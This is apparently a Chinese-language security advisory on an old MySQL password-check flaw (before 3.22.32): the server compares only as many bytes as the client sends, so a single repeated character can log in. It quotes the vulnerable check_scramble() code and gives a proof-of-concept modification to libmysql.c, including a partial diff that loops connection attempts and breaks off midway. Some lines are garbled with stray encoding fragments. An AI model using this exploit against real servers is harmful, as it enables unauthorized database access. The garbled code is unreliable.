◆ Mysql远程访问漏洞


    一. 概述

MySQL是一个常用的小型数据库系统，国内有很多站点正在使用它作为web数据库。
在MySQL的口令验证机制里存在安全漏洞。它允许任何用户从有目标机器数据库访问权限
的机器上与该数据库进行连接。攻击者不必知道帐号的口令，而只需知道一个可用的帐号
名即可。
所有低于Mysql 3.22.32的版本可能都是有问题的。

二. 细节

MySQL的口令认证的机制是这样的：当一个客户端发送一个连接请求的时候，服务端会首
先产生一个随机字符串(A)，将这个字符串发送给客户端，客户端会用这个字符串和用户
输入的口令所产生的Hash值(B)生成一个新的字符串(C)。 并将这个新的字符串返回给服
务端。服务端将原先的随机字符串(A)与数据库中保存的口令Hash值(B')再生成一个字符
串(C'),比较这两个字符串(C和C')的内容是否一致,如果一致就允许登录，否则就不允许
登录。

然而，当比较C和C'这两个字符串内容的时候，由于没有考虑比较字符串的长度，导致了
问题的产生。从sql/password.c中可以看到有问题的代码部分：

my_bool check_scramble(const char *scrambled, const char *message,
ulong *hash_pass, my_bool old_ver)
{
......
while (*scrambled)
{
if (*scrambled++ != (char) (*to++ ^ extra))
return 1; ?* Wrong password */
}
return 0;
}
......

这里的scrambled就是客户端提供的字符串C,(*to++ ^ extra))就是服务端生成的字符串
C'(中的一个字符).我们可以看到，比较的次数决定于客户端提供的字符串C的长度。问
题就出在这里了，本来服务端应当首先判断这两个字符串长度是否相等的，但是它没有，
所以如果客户端提供的字符串只有一个字符，那么check_scramble()将只比较C和C'的第
一个字节。


C'的内容是随机产生的，所以第一次登录和第二次登录时，C'的第一个字符通常是不同的。
例如：
@SQOGRFA 第一次
VV]KPIU_ 第二次
M[PPRYX^ 第三次

但是，根据分析，C'的每一个字符只可能有32种可能性，即:
ABCDEFGHIGKLMNOPQRSTUVWXYZ\_][]@^

那么理论上说，如果我们每次连接都发送同一个字符（比如'A')作为口令，那么32次连接
中会有一次成功。当然，这只是从概率上统计，实际上尝试的次数会从1次到100多次不等。

三. 测试程序

根据上面的分析，我们只要每次发送一个字符给服务端，如果返回错误信息，我们再次发
送这个字符，直到成功为止。为了简单起见，我们可以修改mysql的client程序.
在client/libmysql.c中, mysql_real_connect()函数是用来与服务端建立连接的。

......
MYSQL * STDCALL
mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{

......
DBUG_PRINT("info",("user: %s",buff+5));
/* 这里的scramble()函数将产生校验用的口令字符串C，然后将C复制到strend(buff+5)+1
处，既然我们只是要发送一个字符过去，我们可以注释掉这两行，直接将一个字?br> 复制过去即?br> ?/
?br> ?br> end=scramble(strend(buff+5)+1, scramble_buff, passwd,
?my_bool) (mysql->protocol_version == 9));

if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
......
} ?br> ?br> 修改后变成: ?br> ?.....
MYSQL * STDCALL
mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char *unix_socket,uint client_flag)
{

......
DBUG_PRINT("info",("user: %s",buff+5));
?br> /*
end=scramble(strend(buff+5)+1, scramble_buff, passwd,
?my_bool) (mysql->protocol_version == 9));
?/
end = strend(buff+5) +1 ;
*end = 'A';
end ++;
*end = '\0'; ?br>
if (db && (mysql->server_capabilities & CLIENT_CONNECT_WITH_DB))
{
......
}

然后我们将这个mysql_real_connect()改名成mysql_real_connect_orig(),构造一个新的
mysql_real_connect(),它将循环调用原来的mysql_real_connect_orig(),当不断尝试发送
字符'A'进行连接，直到通过口令验证为止。


注意：下面提供的程序仅供在本机测试使用，请不要用于非法目的，后果自负！

libmysql.c.diff
8<-----8<-----8<-----8<---- cut here ---8<-----8<-----8<-----8<-----8<----
--- mysql-3.22.27/client/libmysql.c Wed Oct 6 00:37:25 1999
+++ mysql-3.22.27_new/client/libmysql.c Tue Feb 13 14:12:37 2000
@@ -46,6 +46,8 @@
uint mysql_port=0;
my_string mysql_unix_port=0;

+uint trynum=0;
+
#define CLIENT_CAPABILITIES (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_LOCAL_FILES)

#if defined(MSDOS) || defined(__WIN32__)
@@ -985,13 +987,13 @@
}


-/*
+/*
** Note that the mysql argument must be initialized with mysql_init()
** before calling mysql_real_connect !
*/

MYSQL * STDCALL
-mysql_real_connect(MYSQL *mysql,const char *host, const char *user,
+mysql_real_connect_orig(MYSQL *mysql,const char *host, const char *user,
const char *passwd, const char *db,
uint port, const char